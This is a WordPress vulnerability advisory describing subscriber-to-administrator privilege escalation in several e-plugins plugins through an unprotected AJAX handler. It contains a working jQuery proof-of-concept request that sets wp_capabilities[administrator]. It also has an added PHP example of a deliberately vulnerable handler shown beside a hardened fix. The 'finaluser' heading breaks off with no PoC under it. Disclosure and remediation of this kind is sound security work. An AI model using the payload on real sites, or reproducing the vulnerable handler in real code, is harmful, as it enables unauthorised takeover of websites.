wpvulndb | Omar Badran | WPVDB-ID: D079CB16-EAD5-4BC8-B0B8-4A4DC2A54C96
History: Mar 06, 2023 - 12:00 a.m.

Multiple e-plugins - Subscriber+ Privilege Escalation

Published 2023-03-06 00:00:00 by Omar Badran (wpscan.com)
Tags: e-plugins, developer, security measures, ajax calls, plugin.php, user registration, vulnerable

EPSS: 0.001 (percentile 37.2%)

The plugins, all sold by the same developer (e-plugins), do not implement any security measures (no nonce, no capability check) in some of their AJAX calls. For example, in the file plugin.php, the function iv_directories_update_profile_setting() passes whatever data the AJAX request supplies straight to update_user_meta(). Because WordPress stores a user's roles in the user-meta key {$wpdb->prefix}capabilities (wp_capabilities on a default install), writing to that key is enough to give the logged-in user administrator capabilities. Since the plugins allow user registration via a custom form (even when the blog does not allow users to register), any site using them is vulnerable: an attacker can self-register a subscriber account and then escalate it.

PoC

directory-pro (set the current logged-in user to admin). Run from the browser console of a site where you are logged in as a subscriber:

    // form_data is a URL-encoded string; the handler passes its keys and values
    // to update_user_meta(), so this writes the caller's wp_capabilities meta.
    jQuery.ajax({
      url: "http://localhost/wp-admin/admin-ajax.php",
      method: "post",
      data: {
        action: "iv_directories_update_profile_setting",
        form_data: "wp_capabilities[administrator]=1"
      },
      success: function (res) { console.log(res); }
    });

finaluser (edit user to set as admin):
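The handler pattern the advisory describes, as an added example that is not the plugin's own code: a reconstruction of an AJAX handler that hands request data to update_user_meta() without any checks, beside a hardened version of the same handler. Only the action name and the use of update_user_meta() come from the advisory; the function bodies, the parse_str() handling of form_data, the nonce action name iv_update_profile and the meta keys in the allow-list are assumptions made for this example.

```php
<?php
// Added example (not the plugin's code): the AJAX-handler pattern described in
// the advisory, reconstructed as a vulnerable handler beside a hardened one.
// Assumptions: the handler receives its fields as a URL-encoded string in
// $_POST['form_data'] and unpacks it with parse_str(); the nonce action
// 'iv_update_profile' and the allow-listed meta keys are made up for the example.

// ---- Vulnerable pattern (what the advisory describes) ----------------------
// Hooked on wp_ajax_, so any logged-in user (a self-registered subscriber
// included) can reach it. No nonce, no capability check, and the meta key is
// taken verbatim from the request. WordPress keeps a user's roles in the
// user-meta key "{$wpdb->prefix}capabilities" (wp_capabilities by default), so
// form_data=wp_capabilities[administrator]=1 turns the caller into an admin.
function iv_directories_update_profile_setting_vulnerable() {
    parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $fields ); // assumed parsing step
    $user_id = get_current_user_id();
    foreach ( $fields as $key => $value ) {
        update_user_meta( $user_id, $key, $value ); // attacker-chosen key AND value
    }
    wp_send_json_success();
}
// Deliberately not registered here; shown only for contrast with the version below.

// ---- Hardened form ---------------------------------------------------------
// Hypothetical profile fields the form is allowed to write. Role and level
// keys (wp_capabilities, wp_user_level) are never in this list.
const IV_PROFILE_META_ALLOWLIST = array( 'iv_phone', 'iv_website', 'iv_bio' );

function iv_directories_update_profile_setting_hardened() {
    // 1. The request must carry a nonce the plugin issued for this action;
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'iv_update_profile', 'nonce' );

    // 2. Explicit authorisation on the target user. The edit_user meta
    //    capability keeps the check correct if the handler later accepts a
    //    user_id parameter for editing other accounts.
    $user_id = get_current_user_id();
    if ( ! $user_id || ! current_user_can( 'edit_user', $user_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $fields );

    // 3. Allow-list the meta keys and accept only scalar values. Anything
    //    else, including wp_capabilities[...] arrays, is dropped, not written.
    $written = array();
    foreach ( $fields as $key => $value ) {
        if ( ! in_array( $key, IV_PROFILE_META_ALLOWLIST, true ) || ! is_scalar( $value ) ) {
            continue;
        }
        update_user_meta( $user_id, $key, sanitize_text_field( $value ) );
        $written[] = $key;
    }
    wp_send_json_success( array( 'updated' => $written ) );
}
add_action( 'wp_ajax_iv_directories_update_profile_setting', 'iv_directories_update_profile_setting_hardened' );
```

Against the hardened handler the PoC request above fails twice over: it carries no nonce, and even with one, wp_capabilities is not an allow-listed key, so the loop never calls update_user_meta() for it. The registration path is a separate fix: a custom registration form should honour get_option('users_can_register') so that a site with registration disabled does not hand out the subscriber accounts this escalation starts from.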
